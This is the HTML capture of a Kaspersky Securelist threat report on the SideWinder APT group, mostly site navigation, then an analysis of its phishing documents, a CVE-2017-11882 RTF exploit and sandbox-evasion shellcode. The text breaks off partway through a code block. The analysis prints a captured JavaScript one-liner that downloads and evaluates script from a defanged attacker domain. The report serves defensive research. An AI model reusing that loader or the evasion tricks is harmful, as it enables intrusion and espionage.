menu-item-type-taxonomy menu-item-object-category menu-item-87882"><a href="https://securelist.com/category/kaspersky-security-bulletin/">Kaspersky Security Bulletin</a> </ul> <li class="menu-item menu-item-type-post_type menu-item-object-page current_page_parent menu-item-101953"><a href="https://securelist.com/all/">Archive</a> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-87899"><a href="https://securelist.com/tags/">All Tags</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-101954"><a href="https://apt.securelist.com/?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_mobmen_sm-team_______03880766cb97f3a8">APT Logbook</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-101955"><a href="https://securelist.com/webinars/">Webinars</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-102687"><a href="https://statistics.securelist.com/?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_mobmen_sm-team_______03880766cb97f3a8">Statistics</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-87901"><a target="_blank" href="https://encyclopedia.kaspersky.com/?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_mobmen_sm-team_______03880766cb97f3a8">Encyclopedia</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-87902"><a target="_blank" href="https://threats.kaspersky.com/?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_mobmen_sm-team_______03880766cb97f3a8">Threats descriptions</a> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-105984"><a href="https://securelist.com/ksb-2021/">KSB 2021</a> <li class="splitter"></li> <li class="parent" data-parent="About Us" data-icon="top-item"><a rel="About Us" href="#"><i class="top-item"></i><span>About Us</span></a> <ul class="submenu"> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-87792"><a href="https://www.kaspersky.com/about/company?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_mobmen_sm-team_______03880766cb97f3a8">Company</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-87968"><a href="https://www.kaspersky.com/transparency?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_mobmen_sm-team_______03880766cb97f3a8">Transparency</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-87971"><a href="https://www.kaspersky.com/about/press-releases?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_mobmen_sm-team_______03880766cb97f3a8">Corporate News</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-87796"><a href="https://press.kaspersky.com/?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_mobmen_sm-team_______03880766cb97f3a8">Press Center</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-87797"><a href="https://www.kaspersky.com/about/careers?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_mobmen_sm-team_______03880766cb97f3a8">Careers</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-87798"><a href="https://www.kaspersky.com/about/sponsorships/?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_mobmen_sm-team_______03880766cb97f3a8">Sponsorships</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-87970"><a href="https://www.kaspersky.com/about/policy-blog?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_mobmen_sm-team_______03880766cb97f3a8">Policy Blog</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-87793"><a href="https://www.kaspersky.com/about/contact?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_mobmen_sm-team_______03880766cb97f3a8">Contacts</a> </ul> <li class="parent" data-parent="Partners" data-icon="top-item"><a rel="Partners" href="#"><i class="top-item"></i><span>Partners</span></a> <ul class="submenu"> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-87768"><a href="https://www.kasperskypartners.com/?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_mobmen_sm-team_______03880766cb97f3a8">Find a Partner</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-87769"><a href="https://www.kaspersky.com/partners?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_mobmen_sm-team_______03880766cb97f3a8">Partner Program</a> </ul> </ul> <div class="background-overlay"></div> </div> <div class="c-page"> <section class="c-block c-block--bg-image c-page-header js-sticky-header" style="background-image: url(https://securelist.com/wp-content/themes/securelist2020/assets/images/content/bg-gradient-01.jpg);"> <div class="o-container-fluid"> <div class="c-page-header__wrapper u-mt-spacer-base-"> <div class="o-row o-row--small-gutters"> <div class="o-col-3@md u-mt-spacer-base-"> <a data-element-id="content-menu" href="#" class="c-page-nav-toggle js-main-menu-toggle"> <span class="c-page-nav-toggle__icon"> <span></span> <span></span> <span></span> </span> <span class="c-page-nav-toggle__text">Content menu</span> <span class="c-page-nav-toggle__text c-page-nav-toggle__text--active">Close</span> </a> </div> <div class="o-col-6@md"> <form class="c-page-search__form js-main-search-popup js-wizardinfosys_autosearch_form" full_search_url="https://securelist.com/?s=%q%" action="https://securelist.com/" method="get"> <div class="c-form-element c-form-element--style-fill"> <div class="c-form-element__field wp_autosearch_form_wrapper"> <input name="s" class="c-form-element__text wp_autosearch_input ac_input" data-webinars="" type="text" value="" placeholder="Search..." autocomplete="off"> </div> </div> <button class="c-button c-button--icon wp_autosearch_submit"><svg class="o-icon o-svg-icon o-svg-large"><use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="https://securelist.com/wp-content/themes/securelist2020/assets/sprite/icons.svg#icon-search"></use></svg></button> </form> </div> <div class="o-col-3@md c-page-header__utilities"> <a data-element-id="subscribe-button" href="#modal-newsletter" class="c-button c-subscribe-modal-toggle js-modal-open"><svg class="o-icon o-svg-icon o-svg-large"><use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="https://securelist.com/wp-content/themes/securelist2020/assets/sprite/icons.svg#icon-envelope"></use></svg><span>Subscribe</span></a> <div class="c-page-header__dropdown-wrapper"> <button class="c-button c-button--icon c-user-button js-kaspersky-sso-login"><svg class="o-icon o-svg-icon o-svg-large"><use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="https://securelist.com/wp-content/themes/securelist2020/assets/sprite/icons.svg#icon-user"></use></svg></button> </div> </div> </div> </div> </div> <nav class="c-page-nav c-color--invert"> <div class="o-container-fluid"> <div class="o-row o-row--small-gutters"> <div class="o-col-3@md c-page-nav__info"> <div class="c-site-logo__group"> <a data-element-id="content-menu-securelist-logo" href="https://securelist.com/" class="c-site-logo c-site-logo--basic c-site-logo--sm"></a> <span class="c-site-tagline">by Kaspersky</span> </div> <a data-element-id="content-menu-dark-mode" href="#" class="c-theme-switcher js-theme-switcher"><i class="font-icons icon-moon"></i> Dark mode<span class="u-hidden u-inline--dark"> off</span></a> </div> <div class="o-col-9@md"> <div class="c-page-menu"> <div class="o-row c-page-menu__dividers"> <div class="o-col-4@md"><div class="c-accordion js-accordion c-accordion--reset@md"><p id="menu-item-226" class="menu-item-threats section-title accordion menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-226 c-page-menu__title u-hidden u-block@md"><a href="https://securelist.com/threat-categories/" data-element-id="content-menu-link">Threats</a></p><div class="c-accordion-toggle js-accordion-toggle"><p>Threats</p></div><div class="c-accordion-container js-accordion-container"> <ul class="sub-menu"> <li id="menu-item-99839" class="menu-item menu-item-type-taxonomy menu-item-object-threat-category current-post-ancestor current-menu-parent current-post-parent menu-item-99839"><a href="https://securelist.com/threat-category/apt-targeted-attacks/" data-element-id="content-menu-link">APT (Targeted attacks)</a></li> <li id="menu-item-89457" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-89457"><a href="https://securelist.com/threat-category/secure-environment/" data-element-id="content-menu-link">Secure environment (IoT)</a></li> <li id="menu-item-63231" class="topic-item vulnerabilities menu-item menu-item-type-custom menu-item-object-custom menu-item-63231"><a href="https://securelist.com/threat-category/mobile-threats/" data-element-id="content-menu-link">Mobile threats</a></li> <li id="menu-item-63229" class="topic-item detected menu-item menu-item-type-custom menu-item-object-custom menu-item-63229"><a href="https://securelist.com/threat-category/financial-threats/" data-element-id="content-menu-link">Financial threats</a></li> <li id="menu-item-89458" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-89458"><a href="https://securelist.com/threat-category/spam-and-phishing/" data-element-id="content-menu-link">Spam and phishing</a></li> <li id="menu-item-99840" class="menu-item menu-item-type-taxonomy menu-item-object-threat-category menu-item-99840"><a href="https://securelist.com/threat-category/industrial-threats/" data-element-id="content-menu-link">Industrial threats</a></li> <li id="menu-item-89465" class="menu-item menu-item-type-taxonomy menu-item-object-threat-category menu-item-89465"><a href="https://securelist.com/threat-category/web-threats/" data-element-id="content-menu-link">Web threats</a></li> <li id="menu-item-89459" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-89459"><a href="https://securelist.com/threat-category/vulnerabilities-and-exploits/" data-element-id="content-menu-link">Vulnerabilities and exploits</a></li> <li id="menu-item-113855" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-113855"><a href="https://securelist.com/threat-categories/" data-element-id="content-menu-link">All threats</a></li> </ul> </li> </li></ul></div></div></div><div class="o-col-4@md"><div class="c-accordion js-accordion c-accordion--reset@md"><p id="menu-item-230" class="menu-item-categories section-title accordion menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-230 c-page-menu__title u-hidden u-block@md"><a href="https://securelist.com/categories/" data-element-id="content-menu-link">Categories</a></p><div class="c-accordion-toggle js-accordion-toggle"><p>Categories</p></div><div class="c-accordion-container js-accordion-container"> <ul class="sub-menu"> <li id="menu-item-84158" class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-84158"><a href="https://securelist.com/category/apt-reports/" data-element-id="content-menu-link">APT reports</a></li> <li id="menu-item-99841" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-99841"><a href="https://securelist.com/category/malware-descriptions/" data-element-id="content-menu-link">Malware descriptions</a></li> <li id="menu-item-84160" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-84160"><a href="https://securelist.com/category/kaspersky-security-bulletin/" data-element-id="content-menu-link">Security Bulletin</a></li> <li id="menu-item-84161" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-84161"><a href="https://securelist.com/category/malware-reports/" data-element-id="content-menu-link">Malware reports</a></li> <li id="menu-item-89460" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-89460"><a href="https://securelist.com/category/spam-and-phishing-reports/" data-element-id="content-menu-link">Spam and phishing reports</a></li> <li id="menu-item-99842" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-99842"><a href="https://securelist.com/category/security-technologies/" data-element-id="content-menu-link">Security technologies</a></li> <li id="menu-item-84165" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-84165"><a href="https://securelist.com/category/research/" data-element-id="content-menu-link">Research</a></li> <li id="menu-item-84164" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-84164"><a href="https://securelist.com/category/publications/" data-element-id="content-menu-link">Publications</a></li> <li id="menu-item-113876" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-113876"><a href="https://securelist.com/categories/" data-element-id="content-menu-link">All categories</a></li> </ul> </li> </li></ul></div></div></div><div class="o-col-4@md"><p id="menu-item-277" class="menu-item-tags section-title after-accordion menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-277 c-page-menu__title u-hidden u-block@md"><a data-element-id="content-menu-link">Other sections</a></p> <ul class="sub-menu"> <li id="menu-item-100526" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-100526"><a href="https://securelist.com/all/" data-element-id="content-menu-link">Archive</a></li> <li id="menu-item-57837" class="show-all-tags menu-item menu-item-type-post_type menu-item-object-page menu-item-57837"><a href="https://securelist.com/tags/" data-element-id="content-menu-link">All tags</a></li> <li id="menu-item-101956" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-101956"><a href="https://securelist.com/webinars/" data-element-id="content-menu-link">Webinars</a></li> <li id="menu-item-101126" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-101126"><a target="_blank" rel="noopener noreferrer" href="https://apt.securelist.com/?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="content-menu-link">APT Logbook</a></li> <li id="menu-item-241" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-241"><a target="_blank" rel="noopener noreferrer" href="https://statistics.securelist.com/?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="content-menu-link">Statistics</a></li> <li id="menu-item-86643" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-86643"><a target="_blank" rel="noopener noreferrer" href="https://encyclopedia.kaspersky.com/?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="content-menu-link">Encyclopedia</a></li> <li id="menu-item-58141" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-58141"><a target="_blank" rel="noopener noreferrer" href="https://threats.kaspersky.com/?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="content-menu-link">Threats descriptions</a></li> <li id="menu-item-111312" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-111312"><a href="https://securelist.com/ksb-2023/" data-element-id="content-menu-link">KSB 2023</a></li> </ul> </li> </div> </div> </div> </div> </div> </div> </nav> </section> <section class="c-block c-block--spacing-t@md c-block--spacing-b-small@md c-block--divider-internal" style="z-index:10"> <div class="o-container-fluid"> <article class="c-article"> <header class="c-article__header"> <figure class="c-article__figure u-hidden@md"> <img width="800" height="450" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/11172712/SL-SideWinder-StealerBot-featured-800x450.jpg" class="attachment-securelist-2020-thumbnail size-securelist-2020-thumbnail wp-post-image" alt="" decoding="async" fetchpriority="high" data-src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/11172712/SL-SideWinder-StealerBot-featured-800x450.jpg" data-srcset="" srcset="" /> </figure> <p class="c-article__headline u-hidden@md"> <a href="https://securelist.com/category/apt-reports/" class="c-tag c-tag--primary">APT reports</a> </p> <h1 class="c-article__title">Beyond the Surface: the evolution and expansion of the SideWinder APT group</h1> <div class="c-article__info"> <p class="c-article__headline u-hidden u-block@md"> <a href="https://securelist.com/category/apt-reports/" class="c-tag c-tag--primary">APT reports</a> </p> <p class="u-uppercase"><time datetime="2024-10-15T10:00:54+00:00">15 Oct 2024</time></p> <p class="c-article__reading u-ml-auto@md"> <svg class="o-icon o-svg-icon"><use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="https://securelist.com/wp-content/themes/securelist2020/assets/sprite/icons.svg#icon-hourglass"></use></svg> <span class="js-reading-time"></span> minute read </p> </div> </header> <div class="c-article__wrapper"> <div class="c-article__main"> <div class="c-highlight c-highlight--overflow-down@md js-accordion u-hidden@md"> <div class="c-accordion-toggle js-accordion-toggle"> <div class="c-highlight__header"> <div class="c-highlight__icon"> <div class="u-block--theme-light u-hidden--theme-dark"> <img src="https://securelist.com/wp-content/themes/securelist2020/assets/images/icon/icon-categories.svg" /> </div> <div class="u-block--theme-dark u-hidden--theme-light"> <img src="https://securelist.com/wp-content/themes/securelist2020/assets/images/icon/icon-categories--invert.svg" /> </div> </div> <div class="c-highlight__title"> <p>Table of Contents</p> </div> </div> </div> <div class="js-accordion-container"> <div class="c-highlight__body"> <ul class='c-list-links'><li><a href="#infection-vectors">Infection vectors</a></li><li><a href="#rtf-exploit">RTF exploit</a></li><ul class='c-list-links'><li><a href="#initial-infection-lnk">Initial infection LNK</a></li></ul><li><a href="#downloader-module">Downloader module</a></li><li><a href="#moduleinstaller">ModuleInstaller</a></li><li><a href="#backdoor-loader-module">Backdoor loader module</a></li><li><a href="#stealerbot">StealerBot</a></li><ul class='c-list-links'><li><a href="#stealerbot-orchestrator">StealerBot Orchestrator</a></li><li><a href="#modules">Modules</a></li><ul class='c-list-links'><li><a href="#keylogger">Keylogger</a></li><li><a href="#screenshot-grabber">Screenshot Grabber</a></li><li><a href="#file-stealer">File Stealer</a></li><li><a href="#live-console">Live Console</a></li><li><a href="#rdp-credential-stealer">RDP Credential Stealer</a></li><li><a href="#token-grabber">Token Grabber</a></li><li><a href="#credential-phisher">Credential Phisher</a></li><li><a href="#uacbypass">UACBypass</a></li><li><a href="#downloader">Downloader</a></li><ul class='c-list-links'><li><a href="#installers">Installers</a></li><ul class='c-list-links'><li><a href="#installerpayload">InstallerPayload</a></li></ul><li><a href="#installerpayload_net">InstallerPayload_NET</a></li><li><a href="#infrastructure">Infrastructure</a></li></ul><li><a href="#victims">Victims</a></li><li><a href="#attribution">Attribution</a></li></ul></ul><li><a href="#iocs">IOCs</a></li><ul class='c-list-links'><li><a href="#malicious-documents">Malicious documents</a></li><li><a href="#rtf">Rtf</a></li><li><a href="#lnk">Lnk</a></li><li><a href="#backdoor-loader">Backdoor Loader</a></li><li><a href="#stealerbot">StealerBot</a></li><li><a href="#syncbotservicehijack-dll">SyncBotServiceHijack.dll</a></li><li><a href="#service-hijack">Service Hijack</a></li><li><a href="#backdoor-loader-devobj-dll">Backdoor Loader devobj.dll</a></li><li><a href="#domains-and-ips">Domains and IPs</a></li></ul> </div> </div> </div> <div class="o-row c-article__container"> <div class="o-col c-article__content js-article-body"> <div class="js-reading-wrapper"> <figure class="c-article__figure u-hidden u-block@md"> <img width="1200" height="600" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/11172712/SL-SideWinder-StealerBot-featured-1200x600.jpg" class="attachment-securelist-2020-thumbnail-large size-securelist-2020-thumbnail-large wp-post-image" alt="" decoding="async" loading="lazy" data-src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/11172712/SL-SideWinder-StealerBot-featured-1200x600.jpg" data-srcset="" srcset="" /> </figure> <div class="c-article__authors u-hidden u-block@md"> <p class="c-block__title">Authors</p> <ul class="c-list-authors"> <li> <a href="https://securelist.com/author/giampaolodedola/" > <img alt='' src='https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/03/21153414/Giampaolo_Dedola_Securelist_2023-30x30.jpg' srcset='https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/03/21153414/Giampaolo_Dedola_Securelist_2023-60x60.jpg 2x' class='avatar avatar-30 photo' height='30' width='30' loading='lazy' decoding='async'/> <span>Giampaolo Dedola</span></a> </li> <li> <a href="https://securelist.com/author/vasilyberdnikov/" > <img src="https://securelist.com/wp-content/themes/securelist2020/assets/images/avatar-default/avatar_default_2.png"> <span>Vasily Berdnikov</span></a> </li> </ul> </div> <div class="js-reading-content"> <div class="c-wysiwyg"> <p>SideWinder, aka T-APT-04 or RattleSnake, is one of the most prolific APT groups that began its activities in 2012 and was first publicly mentioned by us <a href="https://securelist.com/apt-trends-report-q1-2018/85280/" target="_blank" rel="noopener">in 2018</a>. Over the years, the group has launched attacks against high-profile entities in South and Southeast Asia. Its primary targets have been military and government entities in Pakistan, Sri Lanka, China and Nepal.</p> <p>Over the years, SideWinder has carried out an impressive number of attacks and its activities have been extensively described in various analyses and reports published by different researchers and vendors (for example, <a href="https://www.bridewell.com/insights/news/detail/the-distinctive-rattle-of-apt-sidewinder" target="_blank" rel="noopener">here</a>, <a href="https://www.embeeresearch.io/advanced-guide-to-infrastructure-analysis-tracking-apt-sidewinder-domains/" target="_blank" rel="noopener">here</a> and <a href="https://www.trendmicro.com/en_us/research/20/l/sidewinder-leverages-south-asian-territorial-issues-for-spear-ph.html" target="_blank" rel="noopener">here</a>), one of the latest of which was <a href="https://blogs.blackberry.com/en/2024/07/sidewinder-targets-ports-and-maritime-facilities-in-the-mediterranean-sea" target="_blank" rel="noopener">released</a> at the end of July 2024. The group may be perceived as a low-skilled actor due to the use of public exploits, malicious LNK files and scripts as infection vectors, and the use of public RATs, but their true capabilities only become apparent when you carefully examine the details of their operations.</p> <p>Despite years of observation and study, knowledge of their post-compromise activities remains limited.</p> <p>During our investigation, we observed new waves of attacks that showed a significant expansion of the group’s activities. The attacks began to impact high-profile entities and strategic infrastructures in the Middle East and Africa, and we also discovered a previously unknown post-exploitation toolkit called “StealerBot”, an advanced modular implant designed specifically for espionage activities that we currently believe is the main post-exploitation tool used by SideWinder on targets of interest.</p> <div id="attachment_114127" style="width: 924px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/14065505/SideWinder_2024-01.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-114127" class="size-full wp-image-114127" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/14065505/SideWinder_2024-01.png" alt="SideWinder's most recent campaign schema" width="914" height="720" /></a><p id="caption-attachment-114127" class="wp-caption-text">SideWinder’s most recent campaign schema</p></div> <h2 id="infection-vectors">Infection vectors</h2> <p>The SideWinder attack chain typically starts with a spear-phishing email with an attachment, usually a Microsoft OOXML document (DOCX or XLSX) or a ZIP archive, which in turn contains a malicious LNK file. The document or LNK file starts a multi-stage infection chain with various JavaScript and .NET downloaders, which ends with the installation of the StealerBot espionage tool.</p> <p>The documents often contain information obtained from public websites, which is used to lure the victim into opening the file and believing it to be legitimate. For example, the file in the image contains data downloaded from the following URL: <a href="https://nasc.org.np/news/closing-ceremony-training-program-financial-management-and-audit-officials-nepal-oil" target="_blank" rel="noopener">https://nasc.org.np/news/closing-ceremony-training-program-financial-management-and-audit-officials-nepal-oil</a></p> <div id="attachment_114128" style="width: 835px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07145310/SideWinder_2024_02.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-114128" class="size-full wp-image-114128" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07145310/SideWinder_2024_02.png" width="825" height="577" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07145310/SideWinder_2024_02.png 825w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07145310/SideWinder_2024_02-300x210.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07145310/SideWinder_2024_02-768x537.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07145310/SideWinder_2024_02-500x350.png 500w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07145310/SideWinder_2024_02-740x518.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07145310/SideWinder_2024_02-400x280.png 400w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07145310/SideWinder_2024_02-800x560.png 800w" sizes="(max-width: 825px) 100vw, 825px" /></a><p id="caption-attachment-114128" class="wp-caption-text">Snippet of the file 71F11A359243F382779E209687496EE2, “Nepal Oil Corporation (NOC).docx”</p></div> <p>The contents of the file are selected specifically for the target and changed depending on the target’s country.</p> <p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/09110021/SideWinder_2024-03.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-114129" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/09110021/SideWinder_2024-03.png" alt="" width="671" height="465" /></a></p> <p>All the documents use the <a href="https://attack.mitre.org/techniques/T1221/" target="_blank" rel="noopener">remote template injection</a> technique to download an RTF file that is stored on a remote server controlled by the attacker.</p> <p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07145425/SideWinder_2024_04.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-114130" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07145425/SideWinder_2024_04.png" alt="" width="998" height="45" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07145425/SideWinder_2024_04.png 998w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07145425/SideWinder_2024_04-300x14.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07145425/SideWinder_2024_04-768x35.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07145425/SideWinder_2024_04-990x45.png 990w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07145425/SideWinder_2024_04-740x33.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07145425/SideWinder_2024_04-800x36.png 800w" sizes="(max-width: 998px) 100vw, 998px" /></a></p> <h2 id="rtf-exploit">RTF exploit</h2> <p>RTF files were specifically crafted by the attacker to exploit CVE-2017-11882, a memory corruption vulnerability in Microsoft Office software.</p> <p>The attacker embedded shellcode designed to execute JavaScript code using the “RunHTMLApplication” function available in the “mshtml.dll” Windows library.</p> <p>The shellcode uses different tricks to avoid sandboxes and complicate analysis.</p> <ul> <li>It uses GlobalMemoryStatusEx to determine the size of RAM memory. If the size is less than 2GB, it terminates execution.</li> <li>It uses the CPUID instruction to obtain information about the processor manufacturer. If the CPU is not from Intel or AMD, it terminates execution.</li> <li>It attempts to load the “dotnetlogger32.dll” library. If the file is present on the system, it terminates execution.</li> </ul> <p>The malware uses different strings to load libraries and functions required for execution. These strings are truncated and the missing part is added at runtime by patching the bytes. The strings are also mixed inside the code, which is adapted to skip them and jump to valid instructions during execution, to make analysis more difficult.</p> <p>The strings are passed as arguments to a function that performs the same action as “GetProcAddress”: it gets the address of an exported function. To do this, it receives two arguments: a base address of a library that exports the function, and the name of the exported function.</p> <p>The first argument is passed with the standard push instruction, which loads the library address to the stack. The second argument is passed indirectly using a CALL instruction.</p> <div id="attachment_114131" style="width: 786px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07145509/SideWinder_2024_05.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-114131" class="size-full wp-image-114131" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07145509/SideWinder_2024_05.png" alt="Passing necessary arguments" width="776" height="187" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07145509/SideWinder_2024_05.png 776w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07145509/SideWinder_2024_05-300x72.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07145509/SideWinder_2024_05-768x185.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/07145509/SideWinder_2024_05-740x178.png 740w" sizes="(max-width: 776px) 100vw, 776px" /></a><p id="caption-attachment-114131" class="wp-caption-text">Passing necessary arguments</p></div> <p>The loaded functions are then used to perform the following actions:</p> <ol> <li>Load the “mshtml.dll” library and get the pointer to the “RunHTMLApplication” function.</li> <li>Get a pointer to the current command line using the “GetCommandLineW” function.</li> <li>Decrypt a script written in JavaScript that is embedded in the shellcode and encoded with XOR using “0x12” as the key.</li> <li>Overwrite the current process command line with the decoded JavaScript.</li> <li>Call the “RunHTMLApplication” function, which will execute the code specified in the process command line.</li> </ol> <p>The loaded JavaScript downloads and executes additional script code from a remote website.</p> <div id="crayon-67446d0bc5e1f542589114" class="crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover" style=" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;"> <div class="crayon-toolbar" data-settings=" mouseover overlay hide delay" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><span class="crayon-title"></span> <div class="crayon-tools" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><div class="crayon-button crayon-nums-button" title="Toggle Line Numbers"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-plain-button" title="Toggle Plain Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-wrap-button" title="Toggle Line Wrap"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-expand-button" title="Expand Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-copy-button" title="Copy"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-popup-button" title="Open Code In New Window"><div class="crayon-button-icon"></div></div></div></div> <div class="crayon-info" style="min-height: 16.8px !important; line-height: 16.8px !important;"></div> <div class="crayon-plain-wrap"><textarea wrap="soft" class="crayon-plain print-no" data-settings="dblclick" readonly style="-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;"> javascript:eval("v=ActiveXObject;x=new v(\"WinHttp.WinHttpRequest.5.1\");x.open(\"GET\", \"hxxps://mofa-gov- sa.direct888[.]net/015094_consulategz\",false);x.Send();eval(x.ResponseText);window.close()")</textarea></div> <div class="crayon-main" style=""> <table class="crayon-table"> <tr class="crayon-row"> <td class="crayon-nums " data-settings="show"> <div class="crayon-nums-content" style="font-size: 12px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-67446d0bc5e1f542589114-1">1</div><div class="crayon-num crayon-striped-num" data-line="crayon-67446d0bc5e1f542589114-2">2</div><div class="crayon-num" data-line="crayon-67446d0bc5e1f542589114-3">3</div></div> </td> <td class="crayon-code"><div class="crayon-pre" style="font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><div class="crayon-line" id="crayon-67446d0bc5e1f542589114-1"><span class="crayon-i">javascript</span><span class="crayon-sy">:</span><span class="crayon-e">eval</span><span class="crayon-sy">(</span><span class="crayon-s">"v=ActiveXObject;x=new v(\"WinHttp.WinHttpRequest.5.1\");x.open(\"GET\", </span></div><div 